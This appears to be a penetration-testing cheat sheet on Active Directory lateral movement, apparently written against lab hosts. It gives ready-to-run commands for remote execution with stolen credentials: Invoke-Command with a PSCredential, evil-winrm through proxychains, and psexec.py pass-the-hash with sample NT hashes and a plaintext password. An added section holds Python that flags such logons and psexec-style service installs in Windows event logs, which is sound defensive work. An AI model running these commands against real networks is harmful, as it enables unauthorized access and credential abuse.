
AD: Connecting to other hosts

Resources

  • [TheHacker.recipes](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword#forcechangepassword)
  • Index of Active Directory
  • Hardening and auditing Active Directory

Invoke-Command

Invoke-Command runs commands on remote hosts. Passing a PSCredential object with -Credential lets us send explicit credentials with every request (a "nested" Invoke-Command in the author's terms).

# Create a SecureString with the password of the user (e.g. svc_sql), wrap it in a PSCredential, then use Invoke-Command to run a command on the host (e.g. MS01)
# 1. We create a SecureString object with our credentials (single quotes keep the placeholder literal; replace it with the real value)
$SecPassword = ConvertTo-SecureString '$password' -AsPlainText -Force
# Example:
# $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force

# 2. We wrap the domain user and the SecureString in a PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('$domain\$userSamAccountName', $SecPassword)
# Example:
# $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# 3. We send the Invoke-Command with the credential object
Invoke-Command -ComputerName "$hostname.$domainName" -Credential $Cred -ScriptBlock { Get-Content "C:\Users\Administrator\Desktop\flag.txt" }
# Example:
# Invoke-Command -ComputerName "MS01.INLANEFREIGHT.LOCAL" -Credential $Cred -ScriptBlock { Get-Content "C:\Users\Administrator\Desktop\flag.txt" }

Enter-PSSession

Evil-Winrm

With a pivot host (chisel + proxychains):

proxychains evil-winrm -i $ip -u $user -p $password

With hashes:

evil-winrm -i $ip -u Administrator -H "32693b11e6aa90eb43d32c72a07ceea6"

psexec.py

With a pivot host (chisel + proxychains):

proxychains tools/impacket/examples/psexec.py INLANEFREIGHT.LOCAL/svc_sql:lucky7@172.16.6.50

Passing a hash:

# An example: 
python3 psexec.py Administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

# Another example:
impacket-psexec egotistical-bank.local/administrator@$ip -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
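Each of the connection methods above (Invoke-Command with -Credential, evil-winrm with a password or hash, psexec.py with -hashes) leaves host telemetry behind. The following is an added example, not part of this cheat sheet, of a small triage function over constructed Windows event records; the allow-list of jump hosts, the event samples and the %SystemRoot% service-binary heuristic are assumptions for illustration.

```python
import re
from typing import Optional

# Hosts from which remote administration over WinRM/SMB is expected (assumed allow-list).
ALLOWED_ADMIN_SOURCES = {"10.10.5.5"}

# Constructed sample records mirroring the Security/System log fields these tools produce.
SAMPLE_EVENTS = [
    # Network logon authenticated with NTLM from a host that is not a jump host:
    # what an evil-winrm -H or psexec.py -hashes session looks like on the target.
    {"id": 4624, "host": "MS01", "user": "backupadm", "logon_type": 3,
     "auth": "NTLM", "src_ip": "172.16.6.70"},
    # Kerberos network logon from the allowed jump host: expected admin traffic.
    {"id": 4624, "host": "MS01", "user": "jdoe", "logon_type": 3,
     "auth": "Kerberos", "src_ip": "10.10.5.5"},
    # 4648 is logged on the client where explicit credentials were supplied
    # (Invoke-Command -Credential, evil-winrm -u/-p); 'src_ip' is that client.
    {"id": 4648, "host": "WS01", "user": "svc_sql", "target": "Administrator",
     "src_ip": "172.16.6.70"},
    # Service install whose binary is a short random name dropped in %SystemRoot%,
    # the pattern psexec-style tools leave when they push a service over ADMIN$.
    {"id": 7045, "host": "MS01", "service": "XKQW", "image": r"%SystemRoot%\XKQW.exe"},
    # Legitimate service install for comparison.
    {"id": 7045, "host": "MS01", "service": "Spooler",
     "image": r"%SystemRoot%\System32\spoolsv.exe"},
]

PSEXEC_STYLE_IMAGE = re.compile(r"%SystemRoot%\\[A-Za-z]{4,8}\.exe", re.IGNORECASE)


def evaluate(event: dict) -> Optional[str]:
    """Return a finding label for one event, or None when it looks benign."""
    eid = event["id"]
    if (eid == 4624 and event["logon_type"] == 3 and event["auth"] == "NTLM"
            and event["src_ip"] not in ALLOWED_ADMIN_SOURCES):
        return "ntlm-network-logon"        # candidate pass-the-hash / hash-based WinRM or SMB login
    if eid == 4648 and event["src_ip"] not in ALLOWED_ADMIN_SOURCES:
        return "explicit-credential-use"   # -Credential / -u -p from an unexpected client
    if eid == 7045 and PSEXEC_STYLE_IMAGE.fullmatch(event["image"]):
        return "psexec-style-service"      # heuristic: random short binary in %SystemRoot%
    return None


def triage(events: list) -> list:
    """Run evaluate() over a batch and return only the events that raised a finding."""
    return [{"host": ev["host"], "event": ev["id"], "finding": label}
            for ev in events if (label := evaluate(ev))]
```

Pairing the 4624 hit with the 7045 hit on the same host within a short window is the combination most worth alerting on; the single rules are noisy on their own.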

mstsc.exe

Last update: 2025-01-19
Created: January 3, 2025 20:08:12